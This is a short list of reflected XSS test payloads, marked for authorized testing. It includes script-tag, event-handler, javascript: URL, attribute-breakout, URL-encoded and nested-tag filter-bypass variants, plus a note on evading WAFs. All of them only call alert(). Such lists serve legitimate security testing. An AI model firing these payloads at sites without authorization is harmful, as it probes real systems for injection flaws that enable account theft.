# XSS test payloads
# For educational and authorized testing ONLY
# these are standard reflected xss test strings

<script>alert(1)</script>
<script>alert('XSS')</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
"><img src=x onerror=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
"><svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
javascript:alert(1)
'-alert(1)-'
";alert(1);//
</script><script>alert(1)</script>
# some WAFs block this one but worth trying
<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
# encoding tricks
%3Cscript%3Ealert(1)%3C/script%3E
<scr<script>ipt>alert(1)</scr</script>ipt>
